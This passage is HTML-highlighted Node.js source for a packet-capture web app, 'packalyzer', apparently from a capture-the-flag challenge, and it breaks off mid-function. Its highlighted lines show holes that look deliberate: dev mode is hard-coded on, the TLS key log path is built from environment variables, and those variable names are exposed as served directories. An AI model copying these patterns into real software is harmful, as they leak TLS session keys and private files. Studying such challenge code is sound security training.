&lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;events&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;EventEmitter&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;defaultMaxListeners&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;Infinity&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;log&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;print&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;dev_mode&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;key_log_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;dev_mode&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nx"&gt;__dirname&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;DEV&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;SSLKEYLOGFILE&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;options&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="nx"&gt;key&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;readFileSync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;__dirname&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/keys/server.key&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;  &lt;span class="nx"&gt;cert&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;readFileSync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;__dirname&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/keys/server.crt&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
&lt;/span&gt;  &lt;span class="nx"&gt;http2&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;protocol&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;h2&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;         &lt;span class="c1"&gt;// HTTP2 only. NOT HTTP1 or HTTP1.1&lt;/span&gt;
    &lt;span class="nx"&gt;protocols&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;h2&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;],&lt;/span&gt;
  &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="nx"&gt;keylog&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;key_log_path&lt;/span&gt;     &lt;span class="c1"&gt;//used for dev mode to view traffic. Stores a few minutes worth at a time&lt;/span&gt;
&lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="c1"&gt;//==================================&lt;/span&gt;
&lt;span class="c1"&gt;//Standard Mongoose Connection Stuff&lt;/span&gt;
&lt;span class="c1"&gt;//==================================&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;app&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nx"&gt;koa&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;router&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nx"&gt;Router&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="nx"&gt;router&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;use&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;cookie&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="k"&gt;default&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
&lt;span class="nx"&gt;app&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;use&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;router&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;routes&lt;/span&gt;&lt;span class="p"&gt;()).&lt;/span&gt;&lt;span class="nx"&gt;use&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;router&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;allowedMethods&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
&lt;span class="nx"&gt;mongoose&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;connect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;mongodb://localhost:27017/packalyzer&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,{&lt;/span&gt; &lt;span class="nx"&gt;useNewUrlParser&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;Schema&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;mongoose&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Schema&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;userSchema&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nx"&gt;Schema&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;required&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;unique&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="nx"&gt;email&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;required&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;unique&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="nx"&gt;password&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;required&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="nx"&gt;is_admin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Boolean&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;required&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="nx"&gt;captures&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Array&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;required&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;Users&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;mongoose&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;model&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Users&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;userSchema&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="c1"&gt;//Sets Users to be allowed to sniff or just admins&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;Allow_All_To_Sniff&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;//==================================&lt;/span&gt;
&lt;span class="c1"&gt;//Standard Mongoose Connection Stuff&lt;/span&gt;
&lt;span class="c1"&gt;//==================================&lt;/span&gt;

&lt;span class="nb"&gt;Array&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;prototype&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;clean&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;deleteValue&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nx"&gt;deleteValue&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;splice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
      &lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
      &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;uniqueArray&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;arrArg&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;arrArg&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;filter&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;elem&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;pos&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;arr&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;arr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;indexOf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;elem&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nx"&gt;pos&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nx"&gt;load_envs&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;dirs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
  &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;env_keys&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Object&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;keys&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="nx"&gt;env_keys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;typeof&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;env_keys&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]]&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;string&amp;quot;&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;dirs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;push&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;/&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="nx"&gt;env_keys&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;toLowerCase&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/*&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;uniqueArray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;dirs&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;dev_mode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;    &lt;span class="c1"&gt;//Can set env variable to open up directories during dev&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;    &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;env_dirs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;load_envs&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;env_dirs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/pub/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/uploads/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;api_functions&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="s1"&gt;&amp;#39;login&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nx"&gt;login&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s1"&gt;&amp;#39;logout&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nx"&gt;logout&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s1"&gt;&amp;#39;users&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nx"&gt;find_users&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s1"&gt;&amp;#39;register&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nx"&gt;register&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s1"&gt;&amp;#39;upload&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nx"&gt;upload&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s1"&gt;&amp;#39;list&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nx"&gt;list_caps&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s1"&gt;&amp;#39;delete&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nx"&gt;delete_caps&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s1"&gt;&amp;#39;sniff&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nx"&gt;sniff_traffic&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s1"&gt;&amp;#39;process&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nx"&gt;start_process&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;api_function&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;async&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;Session&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;sessionizer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;action&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;params&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;action&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nx"&gt;Session&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;authenticated&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;Object&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;keys&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;api_functions&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;includes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;action&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;login&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;register&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;users&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;includes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;action&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;typeof&lt;/span&gt; &lt;span class="nx"&gt;api_functions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;action&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;function&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
          &lt;span class="nx"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;api_functions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;action&lt;/span&gt;&lt;span class="p"&gt;](&lt;/span&gt;&lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;Session&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;catch&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
          &lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
          &lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;status&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;500&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
